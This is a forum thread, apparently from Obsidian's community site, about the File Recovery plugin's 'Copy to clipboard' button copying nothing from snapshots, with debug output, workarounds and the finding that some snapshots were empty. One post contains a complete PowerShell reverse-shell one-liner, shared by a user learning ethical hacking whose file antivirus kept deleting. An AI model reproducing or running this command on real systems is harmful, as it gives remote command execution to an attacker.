File recovery does not copy snapshot to clipboard

Things I have tried

to recovery a file with snapshot using recovery plugin.

What I’m trying to do

using file recoverty plugin

snapshot failed to be copied into clipboard. sounds weird but true,
And I also want to know how to access snapshots data in the file system. I’m using Windows 10.

What is the output of the “Show Debug info” command?

There is a callout said file copied to your clipboard. nothing else

Run the Obsidian command “Show Debug info”. And then paste that info into this forum.

I have the same problem as the OP…

SYSTEM INFO:
Obsidian version: v0.15.8
Installer version: v0.15.8
Operating system: Windows 10 Home 10.0.19043
Login status: not logged in
Insider build toggle: off
Live preview: on
Legacy editor: off
Base theme: dark
Community theme: none
Snippets enabled: 0
Restricted mode: on

RECOMMENDATIONS:
none

Does the console report anything?

To check for errors, first open the developer tools by pressing Ctrl-Shift-I on Windows/Linux or Cmd-Opt-I on macOS, and then go to the “Console” tab. If you want to save the error to a log file, you can right click on the error and choose “Save as…”

Thankyou. I retrieved my text (with code wrapped around every line…) via the console. That will solve my immediate problem.

On the original problem there is no error to save. When I click the Copy to Clipboard I get a popup Copied to clipboard, but it is empty ie nothing pastes into a document. No error message, just nothing.

Well, it appears that nothing can be pasted - no matter the source - either as Paste or Paste as plain text. Having rescued my text via Console and edited it down, I now cannot get it into a document, existing or new.

That the problem appeared to be with Snapshot problem may be a red herring.

If you use some other text-editing program to edit and save the file, does your system allow that? I.e. is it Obsidian specific? Could there be some weird symbol from an internet copy-paste in the original file that is not visible in Obsidian but is causing problems?
Good luck!

CONFIRMED - just lost a file replaced by a load of NULL characters, could see the file in file recovery and COPY TO CLIPBOARD doesn’t work - brings up notification ‘copied to clipboard’ but then it’s NOT in the clipboard, tried pasting to external apps aswell, it’s just not there.

I’m having the same problem just now as well! I can’t copy the recovery notes :frowning:

Can you Post a screen recording

hey, I had the same problem my file is deleted every time that i want to paste this code, I’m learning ethical hacking in Tryhackme, idk why, someone knows?

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Some antivirus software automatically deletes code that can be used maliciously, it even if it is in a markdown file.
You might be able to configure an exception for your vault folder.

1 Like

I believe i have the same issue. Here is my copied console issues.

[Violation] ‘requestAnimationFrame’ handler took 179ms
app.js:1 [Violation] ‘requestAnimationFrame’ handler took 356ms
[Violation] ‘scroll’ handler took 1716ms
5[Violation] Forced reflow while executing JavaScript took ms
[Violation] Forced reflow while executing JavaScript took 396ms
[Violation] Forced reflow while executing JavaScript took 2742ms
[Violation] Forced reflow while executing JavaScript took 2011ms
[Violation] Forced reflow while executing JavaScript took 348ms
[Violation] Forced reflow while executing JavaScript took 3182ms
[Violation] ‘scroll’ handler took 11244ms
app.js:1 [Violation] ‘contextmenu’ handler took 5914ms
app.js:1 [Violation] ‘contextmenu’ handler took 293ms
app.js:1 [Violation] ‘contextmenu’ handler took 281ms
app.js:1 [Violation] ‘keydown’ handler took 379ms
app.js:1 [Violation] ‘focus’ handler took 372ms
app.js:1 [Violation] ‘mousedown’ handler took 9140ms
[Violation] ‘mousemove’ handler took 288ms

Additionally here is my copied info of the issues tab:

1. Audit usage of navigator.userAgent, navigator.appVersion, and navigator.platform

2. A page or script is accessing at least one of navigator.userAgent, navigator.appVersion, and navigator.platform. Starting in Chrome 101, the amount of information available in the User Agent string will be reduced.

To fix this issue, replace the usage of navigator.userAgent, navigator.appVersion, and navigator.platform with feature detection, progressive enhancement, or migrate to navigator.userAgentData.

Note that for performance reasons, only the first access to one of the properties is shown.

1. AFFECTED RESOURCES
1. 1 source

1. codemirror.js:1
    • Learn more: User-Agent String Reduction

Hi, did have the exact same initial problem: a single page was totally erased (no text). I proceeded initially as described for the File Recovery - and ran into the very same problem: I did see the last version with text in the File Recovery window, but the “Copy to clipboard” wouldn’t, well, copy to the clipboard.
The solution (at least for me and found with a bit of luck): I added some text to the “old”, now empty page. There were then several versions of this file visible in the left side bar of the File Recovery box after selecting this page. Due to the last modification, the version I wanted to restore was now NOT the most recent one, but the 2nd most recent one. This version now showed several lines with the text “x lines folded”.
I clicked on these lines, now showing the folded lines… and after that, copying to the clipboard suddenly worked for the entire content.
All this makes me suspect that the most recent version saved by File Recovery may somehow be regarded by Obsidian as “fully folded”, but displayed as “not folded”. That would explain that nothing is send to the clipboard. Just guts feeling… but maybe the experts can have a look !

I just had this problem with a file that got overwritten and was suddenly blank, and it was my first time using the snapshot feature so this may be obvious to more experienced users, but in my case it was user error – I was trying to copy the last version of the file that displayed all text, but it was the wrong version in file history (file size 0 B), so that’s why it didn’t copy. :see_no_evil:

It still said “copied to clipboard” so I did not realize and went to search for answers, then found out thanks to trying to recreate syrom’s steps (which were for the actual bug, but it still helped me, thank you!).

I just had exactly the same problem as kavka described.
The whole file content was deleted and I “couldn’t copy” it from file file recovery window. At least that’s what I thought until I saw that this version was 0B size. Then I actually copied the previous version.

I think the UX could be improved a bit here. When the snapshot is 0B you could display text like “Nothing to copy to clipboard. This file snapshot is empty. Check other file versions” instead of “Copy to clipboard” button.

Or maybe we should not show the diff by default but just the whole file content of the snapshot. Then it would be cleared that this is actually empty snapshot.

This a just my random thoughts about improving the UX of recovery window.

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.